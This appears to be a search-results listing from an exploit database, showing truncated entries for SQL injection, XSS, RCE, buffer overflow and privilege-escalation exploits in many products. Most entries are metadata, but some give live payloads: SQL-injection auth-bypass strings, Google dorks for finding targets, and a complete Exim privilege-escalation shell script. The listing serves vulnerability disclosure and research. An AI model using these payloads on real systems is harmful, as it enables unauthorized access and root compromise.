39001 matches found
SIPve 0.0.2-R19 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: SIPve 0.0.2-R19 - SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: https://sourceforge.net/projects/sipve/ Software Link: https://datapacket.dl.sourceforge.net/project/sipve/sipve-v0.0.2-R19.tar.gz Version: 0.0.2-R19...
PlayJoom 0.10.1 - catid SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: PlayJoom 0.10.1 - 'catid' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://playjoom.telgo.info/ Software Link: https://ayera.dl.sourceforge.net/project/playjoom/0.10.1/playjoom-0.10.1-installpackage.zip Version...
Linux Kernel 4.14.7 ( Ubuntu 16.04 / CentOS 7) Arbitrary File Read Exploit
Exploit for linux platform in category local exploits // A proof-of-concept exploit for CVE-2017-18344. // Includes KASLR and SMEP bypasses. No SMAP bypass. // No support for 1 GB pages or 5 level page tables. // Tested on Ubuntu xenial 4.4.0-116-generic and 4.13.0-38-generic // and on CentOS 7...
Canon MF210 / MF220 - Authenticaton Bypass Vulnerability
Exploit for hardware platform in category web applications Exploit Title: Incorrect Access Control in Canon MF210 & MF220 Series Exploit Author: Huy Kha Vendor Homepage: http://global.canon.com Software Link: Website Version: MF210 & MF20 Series Severity: High Tested on: Mozilla FireFox Descripti...
Linux Local Privilege Escalation Vulnerability
A Linux PIE/stack corruption vulnerability exists. Most notably, all versions of CentOS 7 before 1708 released on September 13, 2017, all versions of Red Hat Enterprise Linux 7 before 7.4 released on August 1, 2017, and all versions of CentOS 6 and Red Hat Enterprise Linux 6 are exploitable. Linu...
Exim 4.84-3 - Privilege Escalation
Exploit for windows platform in category local exploits !/bin/sh CVE-2016-1531 exim /tmp/root.pm EOF package root; use strict; use warnings; system"/bin/sh"; EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps 0day.today 2018-02-19...
WikkaWiki 1.3.4 Cross Site Scripting Vulnerability
WikkaWiki version 1.3.4 suffers from a cross site scripting vulnerability. Vendor: Wikka Development Team Vulnerable Versions: 1.3.4 and probably prior Tested Version: 1.3.4 Vendor Notification: August 21, 2013 Vendor Patch: August 31, 2013 Public Disclosure: September 11, 2013 Vulnerability Type...
Micro CMS <= 0.3.5 (microcms_path) Remote File Include Vulnerability
Exploit for unknown platform in category web applications ==================================================================== Micro CMS = 0.3.5 microcmspath Remote File Include Vulnerability ==================================================================== Find By: CeNGiZ-HaN email protected...
phpDEV5 Remote Default Insecure Users Vuln
Exploit for unknown platform in category web applications ========================================== phpDEV5 Remote Default Insecure Users Vuln ========================================== ------------------------------------------------------------------------ PHPDev5 Remote Insecure Default Users...
WordPress Nabz Image Gallery 1.00 SQL Injection Vulnerability
CVE-2024-55981 Nabz Image Gallery = v1.00 - Unauthenticated SQL Injection Description The Nabz Image Gallery plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, v1.00 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation o...
ABB Cylon Aspect 3.08.03 webServerDeviceLabelUpdate.php Denial of Service Vulnerability
ABB Cylon Aspect version 3.08.03 suffers from an authenticated arbitrary content injection vulnerability in the webServerDeviceLabelUpdate.php script due to a lack of input validation. Authenticated attackers can exploit the deviceLabel POST parameter to write arbitrary content to a fixed file...
Akuvox Smart Intercom/Doorphone ServicesHTTPAPI Improper Access Control Vulnerability
The Akuvox Smart Intercom/Doorphone suffers from an insecure service API access control. The vulnerability in ServicesHTTPAPI endpoint allows users with "User" privileges to modify API access settings and configurations. This improper access control permits privilege escalation, enabling...
Atlassian Confluence Administrator Code Macro Remote Code Execution Exploit
This Metasploit module exploits an authenticated administrator-level vulnerability in Atlassian Confluence, tracked as CVE-2024-21683. The vulnerability exists due to the Rhino script engine parser evaluating tainted data from uploaded text files. This facilitates arbitrary code execution. This...
Simple Inventory Management System v1.0 - (email) SQL Injection Vulnerability
Exploit Title: Simple Inventory Management System v1.0 - 'email' SQL Injection Application: Simple Inventory Management System Bugs: SQL Injection Exploit Author: SoSPiro Vendor Homepage: https://www.sourcecodester.com/ Software Link:...
PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities
Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities Exploit Author: Kerimcan Ozturk Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/business-directory-script/ Version: 3.2 Tested on: Windows 10 Pro Description Technical Detail...
Expert Job Portal Management System 1.0 SQL Injection Vulnerability
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ Vulnerability ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │...
Intern Record System v1.0 - SQL Injection (Unauthenticated) Vulnerability
Exploit Title: Intern Record System v1.0 - SQL Injection Unauthenticated Exploit Author: Hamdi Sevben Vendor Homepage: https://code-projects.org/intern-record-system-in-php-with-source-code/ Software Link: https://download-media.code-projects.org/2020/03/InternRecordSystemInPHPWithSourceCode.zip...
XWorm Trojan 2.1 - Null Pointer Derefernce DoS Vulnerability
Exploit Author: XWorm Trojan 2.1 - Null Pointer Derefernce DoS Exploit Author: TOUHAMI KASBAOUI Vendor Homepage: https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ Software Link: N/A Version: 2.1 Tested on: Windows 10 CVE : N/A...
WordPress WP All Import v3.6.7 - Remote Code Execution Exploit
Exploit Title: WP All Import v3.6.7 - Remote Code Execution RCE Authenticated Exploit Author: AkuCyberSec https://github.com/AkuCyberSec Vendor Homepage: https://www.wpallimport.com/ Software Link: https://wordpress.org/plugins/wp-all-import/advanced/ scroll down to select the version Version: =...
WorkOrder CMS 0.1.0 - SQL Injection Vulnerability
Exploit Title: WorkOrder CMS 0.1.0 - SQL Injection Exploit Author: Chokri Hammedi Vendor Homepage: https://github.com/romzes13/WorkOrderCMS Software Link: https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip Version: 0.1.0 Tested on: Linux Auth Bypass: username:' or '1'='1...
WordPress Testimonial Slider And Showcase 2.2.6 Cross Site Scripting Vulnerability
Exploit Title: Stored XSS in posttitle parameter in WordPress Plugin "Testimonial Slider and Showcase" 2.2.6 Exploit Author: saitamang , yunaranyancat , amdsyad Vendor Homepage: wordpress Software Link: https://wordpress.org/plugins/testimonial-slider-and-showcase/ Version: 2.2.6 Tested on: Cento...
Wordpress Download Monitor Plugin WordPress V 4.4.4 - SQL Injection (Authenticated) Exploit
Exploit Title: Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection Authenticated Exploit Author: Ron Jost Hacker5preme Vendor Homepage: https://www.download-monitor.com/ Software Link: https://downloads.wordpress.org/plugin/download-monitor.4.4.4.zip Version: 4.4.5 Tested on: Ubun...
RLM 14.2 Cross Site Scripting Vulnerability
Product: RLM 14.2 Vendor: Reprise Software CVE ID: CVE-2021-45422 Vulnerability Title: Reflected Cross-Site Scripting Severity: Medium Authors: Giulia Melotti Garibaldi Introduction: An issue was discovered in Reprise License Manager 14.2, Reprise License Manager 14.2 is affected by a reflected...
WordPress WooCommerce Booster Plugin 5.4.3 - Authentication Bypass Exploit
Exploit Title: WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass Exploit Author: Sebastian Kriesten 0xB455 Contact: https://twitter.com/0xB455 Affected Plugin: Booster for WooCommerce Plugin Slug: woocommerce-jetpack Vulnerability disclosure:...
HFS Http File Server 2.3.x - Remote Command Execution Exploit (3)
Exploit Title: HFS HTTP File Server 2.3.x - Remote Command Execution 3 Google Dork: intext:"httpfileserver 2.3" Exploit Author: Pergyz Vendor Homepage: http://www.rejetto.com/hfs/ Software Link: https://sourceforge.net/projects/hfs/ Version: 2.3.x Tested on: Microsoft Windows Server 2012 R2...
Phraseanet < 4.0.7 - Cross-Site Scripting Vulnerability
Exploit for multiple platform in category web applications Exploit title: Stored XSS vulnerability in Phraseanet DAM Open Source software Exploit Author: Krzysztof Szulski Vendor Homepage: https://www.phraseanet.com Software Link also VM: https://www.phraseanet.com/en/download/ Version affected:...
Wordpress Social Warfare Plugin 3.5.3 - Remote Code Execution Exploit
Title: RCE in Social Warfare Plugin Wordpress =3D3.5.2 Researcher: Luka Sikic Exploit Author: hash3liZer Download Link: https://wordpress.org/plugins/social-warfare/ Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM Github...
Simple E-Document 1.31 - username SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Simple E-Document 1.31 - 'username' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://www.tecorange.com/index.php/download-free-open-source-software/79-simple-e-document-free-open-source-document-and-paper-m...
Alienor Web Libre 2.0 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Alienor Web Libre 2.0 - SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://alienor.org/ Software Link: https://excellmedia.dl.sourceforge.net/project/alienorweblibre/alienorweblibre.zip Version: 2.0 Category:...
LibreHealth 2.0.0 - Arbitrary File Actions Vulnerability
Exploit for php platform in category web applications Exploit Title: LibreHealth 2.0.0 - Arbitrary File Actions Exploit Author: Carlos Avila Vendor Homepage: https://librehealth.io/ Software Link: https://github.com/LibreHealthIO/lh-ehr Version: 2.0.0 Tested on: Debian LAMP, LibreHealth 2.0.0...
Dnsmasq < 2.78 - Heap-Based Overflow Exploit
Exploit for multiple platform in category dos / poc ''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14492.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html 1 Build the docker and open two terminal...
BalkanSys CMS show_pageID SQL injection Vulnerability
Exploit for php platform in category web applications Exploit Title : BalkanSys CMS showpageID SQL injection Exploit Author : xBADGIRL21 Dork : inurl:/?act=showpage or inurl:/?act=showpage "Balkansys" Category: Webapps version: BalkanSys CMS 2.x - 3.x Tested on: Linux | Windows Vendore :...
KiTTY 0.76.1.13 - Start Duplicated Session Hostname Buffer Overflow Exploit
Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow Exploit Author: DEFCESCO Austin A. DeFrancesco Vendor Homepage: https://github.com/cyd01/KiTTY/= Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip Version: ≤...
e107 v2.3.2 - Reflected XSS Vulnerability
Exploit Title: e107 v2.3.2 - Reflected XSS Exploit Author: Hubert Wojciechowski Contact Author: email protected Vendor Homepage: https://e107.org/ Software Link: https://e107.org/download Version: 2.3.2 Testeted on: Windows 10 using XAMPP, Apache/2.4.48 Win64 OpenSSL/1.1.1l PHP/7.4.23 XSS Reflect...
Serendipity 2.4.0 - File Inclusion Remote Code Execution Exploit
Exploit Title: Serendipity 2.4.0 - File Inclusion RCE Author: nu11secur1ty Vendor: https://docs.s9y.org/index.html Software: https://github.com/s9y/Serendipity/releases/tag/2.4.0 Reference: https://portswigger.net/web-security/file-upload Reference:...
Transposh WordPress Translation 1.0.7 Cross Site Scripting Vulnerability
Transposh WordPress Translation versions 1.0.7 and below have an ajax action "tptranslation" which is available to authenticated or unauthenticated users see CVE-2022-2461 that allows them to submit new translations. Translations submitted this way are shown on the Transposh administrative...
Gitlab 14.9 - Authentication Bypass Vulnerability
Exploit Title: Gitlab 14.9 - Authentication Bypass Exploit Authors: Greenwolf & stacksmashing Vendor Homepage: https://about.gitlab.com/ Software Link: https://about.gitlab.com/install Version: GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 Tested on:...
MiniTool Partition Wizard - Unquoted Service Path Vulnerability
Exploit Title: MiniTool Partition Wizard - Unquoted Service Path Exploit Author: Saud Alenazi Vendor Homepage: https://www.minitool.com/ Software Link: https://www.minitool.com/download-center/ Version: 12.0 Tested: Windows 10 Pro x64 es PoC : C:\Users\saudhsc qc MTSchedulerService SC...
OpenBMCS 2.4 SQL Injection Vulnerability
OpenBMCS 2.4 Authenticated SQL Injection Vendor: OPEN BMCS Product web page: https://www.openbmcs.com Affected version: 2.4 Summary: Building Management & Controls System BMCS. No matter what the size of your business, the OpenBMCS software has the ability to expand to hundreds of controllers. Ou...
Nettmp NNT 5.1 - SQL injection Authentication Bypass Vulnerability
Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: https://wiki.nettemp.tk Software Link: https://wiki.nettemp.tk Version: nettmp NNT Tested on: Linux Ubuntu 20.04 Payload: username: 1' or 1=1;-- password: \ Proof of Concept: POS...
WordPress Typebot 1.4.3 Plugin - Stored Cross Site Scripting Vulnerability
Exploit Title: WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting XSS Authenticated Exploit Author: Mansi Singh Vendor Homepage: https://wordpress.org/plugins/typebot/ Software Link: https://wordpress.org/plugins/typebot/ Tested on Windows Reference:...
CloudMe 1.11.2 SEH Buffer Overflow Exploit
import socket import sys target = "127.0.0.1" Written by : lutzenfried Clement Cruchet Exploiting CloudMe 1.11.2 Publisher : CloudMe AB Windows x64 10.0.18362 Build 18362 Buffer Overflow using SEH overwritten technic POP POP RET Exploit for CVE-2018-6892 Technical information used for exploit...
OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Add Admin) Vulnerability
Exploit for php platform in category web applications Exploit Title: OOP CMS BLOG 1.0 - Cross-Site Request Forgery Add Admin Exploit Author: Ihsan Sencan Vendor Homepage: http://zsoft.com.bd/ Software Link: https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blogforup.zip Version: 1.0...
davfs2 1.4.6/1.4.7 - Local Privilege Escalation Exploit
Exploit for linux platform in category local exploits davfs2 1.4.6/1.4.7 local privilege escalation exploit Bug Description: davfs2 is a Linux utility which allows OS users to mount a remote webdav server as a local partition. The bug is well documented at...
TFM MMPlayer (m3u/ppl File) Buffer Overflow
Exploit for windows platform in category local exploits This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/...
acp2sev 7.2.2 Cross Site Scripting Vulnerability
Exploit Title: Self Stored XSS - acp2sev7.2.2 Date: 02/2025 Exploit Author: Andrey Stoykov Version: 7.2.2 Tested on: Ubuntu 22.04 Blog: https://msecureltd.blogspot.com/2025/02/friday-fun-pentest-series-19-self.html Self Stored XSS 1: Steps to Reproduce: 1. Visit...
Apache HugeGraph Gremlin Remote Code Execution Exploit
This Metasploit module exploits CVE-2024-27348, a remote code execution vulnerability that exists in Apache HugeGraph Server in versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve remote code execution through Gremlin, resulting in complete control over the server...
Daily Expense Manager 1.0 - (term) SQL injection Vulnerability
Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi Exploit Author: Stefan Hesselman Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/ Software Link: https://download-media.code-projects.org/2020/01/DAILYEXPENSEMANAGERINPHPWITHSOURCECODE.zip Version: 1.0...
Tinycontrol LAN Controller 3 Denial Of Service Vulnerability
Tinycontrol LAN Controller v3 LK3 Remote Denial Of Service Exploit Vendor: Tinycontrol Product web page: https://www.tinycontrol.pl Affected version: this with a calendar when - then. The device provides a user interface in the form of a web page. The website presents readings of various types of...
Joomla com_booking component 2.4.9 - Information Leak (Account enumeration) Exploit
Exploit Title: Joomla! combooking component 2.4.9 - Information Leak Account enumeration Google Dork: inurl:"index.php?option=combooking" Exploit Author: qw3rTyTy Vendor Homepage: http://www.artio.net/ Software Link: http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download Version:...